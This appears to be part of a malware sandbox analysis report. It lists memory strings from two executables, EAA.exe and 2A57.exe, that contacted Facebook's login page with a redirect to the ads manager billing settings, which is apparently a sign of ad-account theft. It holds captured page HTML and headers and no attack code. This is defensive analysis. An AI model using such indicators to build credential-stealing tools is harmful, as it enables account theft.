                  Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /3"; ma=86 equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @okwww.facebook.comI equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.comz# equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugNIzC4F1vFACekGvbRuCZvM9i/JJ7xmKSRYpVB7zr3dgmTAvfu/cTqkCH0BDO/wQ9P8BkQs4IOzM64ZCiUQ18bA==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:02 GMTD
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debugv9pvwjTBeSyc6REtf/HyyrsHzOiKKGeco98baI/NkC+BXnPN992p97wxzlPbt3fTR3c3Oeg1pmH+0Ypr4oGtng==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:18 GMTD
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"endpointURI":"https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/"},5094],["CookieConsentIFrameConfig",[],{"consent_param":"FQASEhIA.ARYwnNKLDW0bAjniimmdEQD0-W4XhYOZM4oDcwHCWRtFB9xI","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u00 equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.comU/ equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.comog equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.comuyy equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Origin: https://www.facebook.com equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Origin: https://www.facebook.comRf equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Owww.facebook.comf equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: P\www.facebook.com equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: X-YsLoggerBlue","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"7197781313797005068"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7153952142819129718"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster5;v equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Xwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Facebook Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our servi],["_js_datr","n_FHY6nkgbnL7TwJr7T7egKP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","n_FHY_IGNodBHcrJWk00PK3j",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYzuQ"}}},hblp:{consistency:{rev:1006382194},rsrcMap:{"Yktk/RU":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz"},zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz"},wL2J9cL:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz"}},compMap:{TransportSelectingClientSingleton:{r:["Yktk/RU","07JSiP0"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["8zbEZtu","auB0bNr","/o5YvO2","ZEC4RrQ","XJ5NO10","dHsJQ6y","hKY0QKT","BIylKC4","ciHMngx","cYU3c32","n6W4xMH"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Yktk/RU"],be:1}}}},allResources:["8zbEZtu","zPYlTyl","wL2J9cL","XJ5NO10","/o5YvO2","h3ZzAmG","GpQFBwL","n6W4xMH","FY/FPFf","vGt2mxz","ZEC4RrQ","mRpDwmd","cYU3c32","BIylKC4","hKY0QKT"]});}));</script></body></html> equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comd equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.642016530.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `/Pwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: acebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025 equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025KK equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: areers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_ot1t5YjYL3s sx_708a0f"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Meta equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
